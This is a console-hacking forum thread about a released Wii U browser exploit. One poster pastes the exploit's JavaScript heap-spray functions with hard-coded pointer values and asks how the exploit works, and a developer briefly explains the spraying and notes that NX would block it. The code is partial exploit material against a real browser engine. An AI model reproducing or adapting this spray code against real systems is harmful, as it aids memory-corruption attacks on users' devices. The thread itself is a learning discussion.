Advertising (This ad goes away for registered users. You can Login or Register)

Official Wii U Browser Exploit Released

Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
Locked
BSnake
Posts: 20
Joined: Fri Jan 07, 2011 10:55 am
Location: Mars

Official Wii U Browser Exploit Released

Post by BSnake »

Maybe someone is interested in this:
http://www.maxconsole.com/maxcon_forums ... t-Released

I have not tested it or anything else.
Advertising
Devices
  • PSV 3.51 PSM
  • PSVS 3.51 PSM
  • PS4 2.51
  • PS3 4.60 CFW
  • (2) PSP 1000 6.60 PRO
  • PSP 2000 6.60 ME-2.2
  • PSP GO 6.20 PRO
  • PS2 FMCB
  • Xbox 360 Wasabi
  • Xbox 360 RGH
  • Xbox XBMC
  • Wii 4.3 HBC
  • WiiU 5.3.2 :)
shadyblue9o9
Posts: 64
Joined: Thu Jan 06, 2011 5:39 am

Re: Official Wii U Browser Exploit Released

Post by shadyblue9o9 »

Ok, i am asking this just because im curious as to how the wii u exploit is actually being executed...

[spoiler]function sprayOne(mem, size, v)
{
var a = new Uint32Array(size - 20);
for (var j = 0; j < a.length; j++) a[j] = v;
var t = document.createTextNode(String.fromCharCode.apply(null, new Uint32Array(a)));
mem.push(t);
}
function spray(size, n)
{
var string_size = size / 2;
var str = unescape("%u6000%u0000");
var c = unescape("%4bff%fffc");

while (str.length < string_size)
str += c;

var h1 = [];
h1[0] = str.substring(0, string_size);

for (i = 1; i <= n; i++)
h1 = unescape(h1[0]);

return h1;
}
function sprayInc(n)
{
var str = unescape("%u0e9a%u161c%u0000%u0001%u0000%u0002%u0000%u0003%u0000%u0004%u0000%u0005%u0000%u0006%u0000%u0007%u0000%u0008%u0000%u0009%u0000%u000a%u0000%u000b%u0000%u000c%u0000%u000d%u0000%u000e%u0000%u000f");
str += unescape("%u0000%u0010%u0000%u0011%u0000%u0012%u0000%u0013%u0000%u0014%u0000%u0015%u0000%u0016%u0000%u0017%u0000%u0018%u0000%u0019%u0000%u001a%u0000%u001b%u0000%u001c%u0000%u001d%u0000%u001e%u0000%u001f");
str += unescape("%u0000%u0020%u0000%u0021%u0000%u0022%u0000%u0023%u0000%u0024%u0000%u0025%u0000%u0026%u0000%u0027%u0000%u0028%u0000%u0029%u0000%u002a%u0000%u002b%u0000%u002c%u0000%u002d%u0000%u002e%u0000%u002f");
str += unescape("%u0000%u0030%u0000%u0031%u0000%u0032%u0000%u0033%u0000%u0034%u0000%u0035%u0000%u0036%u0000%u0037%u0000%u0038%u0000%u0039%u0000%u003a%u0000%u003b%u0000%u003c%u0000%u003d%u0000%u003e%u0000%u003f");
str += unescape("%u0000%u0040%u0000%u0041%u0000%u0042%u0000%u0043%u0000%u0044%u0000%u0045%u0000%u0046%u0000%u0047%u0000%u0048%u0000%u0049%u0000%u004a%u0000%u004b%u0000%u004c%u0000%u004d%u0000%u004e%u0000%u004f");
str += unescape("%u0000%u0050%u0000%u0051%u0000%u0052%u0000%u0053%u0000%u0054%u0000%u0055%u0000%u0056%u0000%u0057%u0000%u0058%u0000%u0059%u0000%u005a%u0000%u005b%u0000%u005c%u0000%u005d%u0000%u005e%u0000%u005f");
str += unescape("%u0000%u0060%u0000%u0061%u0000%u0062%u0000%u0063%u0000%u0064%u0000%u0065%u0000%u0066%u0000%u0067%u0000%u0068%u0000%u0069%u0000%u006a%u0000%u006b%u0000%u006c%u0000%u006d%u0000%u006e%u0000%u006f");
str += unescape("%u0000%u0070%u0000%u0071%u0000%u0072%u0000%u0073%u0000%u0074%u0000%u0075%u0000%u0076%u0000%u0077%u0000%u0078%u0000%u0079%u0000%u007a%u0000%u007b%u0000%u007c%u0000%u007d%u0000%u007e%u0000%u007f");
str += unescape("%u0000%u0080%u0000%u0081%u0000%u0082%u0000%u0083%u0000%u0084%u0000%u0085%u0000%u0086%u0000%u0087%u0000%u0088%u0000%u0089%u0000%u008a%u0000%u008b%u0000%u008c%u0000%u008d%u0000%u008e%u0000%u008f");
str += unescape("%u0000%u0090%u0000%u0091%u0000%u0092%u0000%u0093%u0000%u0094%u0000%u0095%u0000%u0096%u0000%u0097%u0000%u0098%u0000%u0099%u0000%u009a%u0000%u009b%u0000%u009c%u0000%u009d%u0000%u009e%u0000%u009f");
str += unescape("%u0000%u00a0%u0000%u00a1%u0000%u00a2%u0000%u00a3%u0000%u00a4%u0000%u00a5%u0000%u00a6%u0000%u00a7%u0000%u00a8%u0000%u00a9%u0000%u00aa%u0000%u00ab%u0000%u00ac%u0000%u00ad%u0000%u00ae%u0000%u00af");
str += unescape("%u0000%u00b0%u0000%u00b1%u0000%u00b2%u0000%u00b3%u0000%u00b4%u0000%u00b5%u0000%u00b6%u0000%u00b7%u0000%u00b8%u0000%u00b9%u0000%u00ba%u0000%u00bb%u0000%u00bc%u0000%u00bd%u0000%u00be%u0000%u00bf");
str += unescape("%u0000%u00c0%u0000%u00c1%u0000%u00c2%u0000%u00c3%u0000%u00c4%u0000%u00c5%u0000%u00c6%u0000%u00c7%u0000%u00c8%u0000%u00c9%u0000%u00ca%u0000%u00cb%u0000%u00cc%u0000%u00cd%u0000%u00ce%u0000%u00cf");
str += unescape("%u0000%u00d0%u0000%u00d1%u0000%u00d2%u0000%u00d3%u0000%u00d4%u0000%u00d5%u0000%u00d6%u0000%u00d7%u0000%u00d8%u0000%u00d9%u0000%u00da%u0000%u00db%u0000%u00dc%u0000%u00dd%u0000%u00de%u0000%u00df");
str += unescape("%u0000%u00e0%u0000%u00e1%u0000%u00e2%u0000%u00e3%u0000%u00e4%u0000%u00e5%u0000%u00e6%u0000%u00e7%u0000%u00e8%u0000%u00e9%u0000%u00ea%u0000%u00eb%u0000%u00ec%u0000%u00ed%u0000%u00ee%u0000%u00ef");
str += unescape("%u0000%u00f0%u0000%u00f1%u0000%u00f2%u0000%u00f3%u0000%u00f4%u0000%u00f5%u0000%u00f6%u0000%u00f7%u0000%u00f8%u0000%u00f9%u0000%u00fa%u0000%u00fb%u0000%u00fc%u0000%u00fd%u0000%u00fe%u0000%u00ff");
str += unescape("%u0000%u0100%u0000%u0101%u0000%u0102%u0000%u0103%u0000%u0104%u0000%u0105%u0000%u0106%u0000%u0107%u0000%u0108%u0000%u0109%u0000%u010a%u0000%u010b%u0e9a%u161c%u0000%u010d%u0000%u010e%u0000%u010f");
str += unescape("%u0000%u0110%u0000%u0111%u0000%u0112%u0000%u0113%u0000%u0114%u0000%u0115%u0000%u0116%u0000%u0117%u0000%u0118%u0000%u0119%u0000%u011a%u0000%u011b%u0000%u011c%u0000%u011d%u0000%u011e%u0000%u011f");
str += unescape("%u0000%u0120%u0000%u0121%u0000%u0122%u0000%u0123%u0000%u0124%u0000%u0125%u0000%u0126%u0000%u0127%u0000%u0128%u0000%u0129%u0000%u012a%u0000%u012b%u0000%u012c%u0000%u012d%u0000%u012e%u0000%u012f");
str += unescape("%u0000%u0130%u0000%u0131%u0000%u0132%u0000%u0133%u0000%u0134%u0000%u0135%u0000%u0136%u0000%u0137%u0000%u0138%u0000%u0139%u0000%u013a%u0000%u013b%u0000%u013c%u0000%u013d%u0000%u013e%u0000%u013f");
str += unescape("%u0000%u0140%u0000%u0141%u0000%u0142%u0000%u0143%u0000%u0144%u0000%u0145%u0000%u0146%u0000%u0147%u0000%u0148%u0000%u0149%u0000%u014a%u0000%u014b%u0000%u014c%u0000%u014d%u0000%u014e%u0000%u014f");
str += unescape("%u0000%u0150%u0000%u0151%u0000%u0152%u0000%u0153%u0000%u0154%u0000%u0155%u0000%u0156%u0000%u0157%u0000%u0158%u0000%u0159%u0000%u015a%u0000%u015b%u0000%u015c%u0000%u015d%u0000%u015e%u0000%u015f");

var h1 = [];
h1[0] = str.substring(0, str.length);

for (i = 1; i <= n; i++)
h1 = unescape(h1[0]);

return h1;
}

function dsm(evnt)
{
// spray
var mem = [];
for (var j = 20; j < 2048; j++) sprayOne(mem, j, 0x1dd7b2c8);

// the code pointer will be read from value + 0x660
// 0x4 only if we spray 0
}
//var mem = dsm();
//alert(mem.length);
//var pointer = sprayPointer();
var pointer = sprayInc(30000);
//var code = spray(0x2c0, 60000);

//alert(pointer.length);
//alert(code.length);[/spoiler]

So this is the data (in the spoiler) that i pulled from the exploit... it seems to me that they are using the amount of memory the string is allotted to achieve the exploit. Im assuming that with the wii u, when the string is added to itself over and over and over, eventually the string exceeds the amount of memory it is allowed to hold, effectively overwriting important data that is causing the crash. Then the var h1 is getting actual address of it so that the user can later inject the code?

im kind of new to this, ive had about a year of c++ programming under my belt and none of that deals with actually causing a buffer overflow... but a lot of it has been fixing my own, out of range, overflows, and memory leak errors... :) .. so am i somewhat right hopefully? lol

also, i believe the reason the exploit does not crash the vita and just reloads the page is because once the maximum amount of memory the string is allowed to hold is reached, it just reloads the page (like a refresh) to clear the previous data... instead of letting the string continue to write data were it shouldn't :S
Advertising
Omega2058
Developer
Posts: 246
Joined: Tue Sep 28, 2010 4:27 am
Contact:

Re: Official Wii U Browser Exploit Released

Post by Omega2058 »

It simply sprays a string in increments at a memory location, going from the names and looking at what it does. Also the NX bit is enabled, so it won't work regardless.

I guess you're somewhat close.
shadyblue9o9
Posts: 64
Joined: Thu Jan 06, 2011 5:39 am

Re: Official Wii U Browser Exploit Released

Post by shadyblue9o9 »

lol... sorry, well i tried it on my ps4 as well just to see what it would do and it says there is not enough system memory =_=
BSnake
Posts: 20
Joined: Fri Jan 07, 2011 10:55 am
Location: Mars

Re: Official Wii U Browser Exploit Released

Post by BSnake »

Update:
Right now Wii U system software versions above and including 4.0.0 to 5.1.0 are supported.
Source
Devices
  • PSV 3.51 PSM
  • PSVS 3.51 PSM
  • PS4 2.51
  • PS3 4.60 CFW
  • (2) PSP 1000 6.60 PRO
  • PSP 2000 6.60 ME-2.2
  • PSP GO 6.20 PRO
  • PS2 FMCB
  • Xbox 360 Wasabi
  • Xbox 360 RGH
  • Xbox XBMC
  • Wii 4.3 HBC
  • WiiU 5.3.2 :)
Locked

Return to “Programming and Security”